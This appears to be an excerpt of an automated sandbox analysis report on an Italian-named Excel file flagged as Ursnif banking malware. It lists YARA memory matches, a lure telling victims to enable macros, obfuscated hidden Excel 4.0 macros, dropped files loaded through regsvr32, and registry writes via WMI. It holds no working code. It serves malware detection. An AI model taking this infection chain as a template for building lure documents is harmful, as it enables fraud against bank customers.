            Source: Yara matchFile source: 00000001.00000003.230238973.00000000064F0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.230353289.00000000064F0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.229290447.00000000064F0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.230045478.00000000064F0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.230314305.00000000064F0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.229630914.00000000064F0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.230265277.00000000064F0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.229134919.00000000064F0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.229363832.00000000064F0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 6220, type: MEMORY

            E-Banking Fraud:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000001.00000003.229213427.00000000064F0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.230333485.00000000064F0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.230412465.00000000064F0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.230133784.00000000064F0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.230002994.00000000064F0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.230288544.00000000064F0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.229859937.00000000064F0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.230087172.00000000064F0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.228968821.00000000064F0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.229570245.00000000064F0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.229688764.00000000064F0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.230173601.00000000064F0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.230402228.00000000064F0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.229749717.00000000064F0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.229955988.00000000064F0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.235674232.00000000064F0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.230206187.00000000064F0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.229807258.00000000064F0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.229908989.00000000064F0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.229052631.00000000064F0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.228882169.00000000064F0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.229435094.00000000064F0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.229503794.00000000064F0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.494838994.00000000064F0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.230387703.00000000064F0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.230238973.00000000064F0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.230353289.00000000064F0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.229290447.00000000064F0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.230045478.00000000064F0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.230314305.00000000064F0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.229630914.00000000064F0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.230265277.00000000064F0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.229134919.00000000064F0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.229363832.00000000064F0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 6220, type: MEMORY

            System Summary:

            barindex
            Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
            Source: Screenshot number: 4Screenshot OCR: Enable Editing" 11_ from the yellow bar above 12 ::- @ Once You have Enable Editing, please click
            Source: Screenshot number: 4Screenshot OCR: Enable Content" 15" from the yellow bar above 16 17 18 WHY I CANNOT OPEN THIS DOCUMENT? 19 20
            Source: Screenshot number: 4Screenshot OCR: Enable Editing" 11_ from the yellow bar above 12 ::- @ Once You have Enable Editing, please click
            Source: Screenshot number: 4Screenshot OCR: Enable Content" 15" from the yellow bar above 16 17 18 WHY I CANNOT OPEN THIS DOCUMENT? 19 20
            Found Excel 4.0 Macro with suspicious formulasShow sources
            Source: InformazioneGenerale.xlsbInitial sample: EXEC
            Source: InformazioneGenerale.xlsbInitial sample: EXEC
            Found abnormal large hidden Excel 4.0 Macro sheetShow sources
            Source: InformazioneGenerale.xlsbInitial sample: Sheet size: 583568
            Source: InformazioneGenerale.xlsbInitial sample: Sheet size: 583568
            Found obfuscated Excel 4.0 MacroShow sources
            Source: InformazioneGenerale.xlsbInitial sample: High usage of CHAR() function: 97
            Source: InformazioneGenerale.xlsbInitial sample: High usage of CHAR() function: 97
            Office process drops PE fileShow sources
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\10.11nov322[1].gifJump to dropped file
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\ProgramData\Dori.ocxJump to dropped file
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\10.11nov322[1].gifJump to dropped file
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\ProgramData\Dori.ocxJump to dropped file
            Writes or reads registry keys via WMIShow sources
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Writes registry values via WMIShow sources
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue<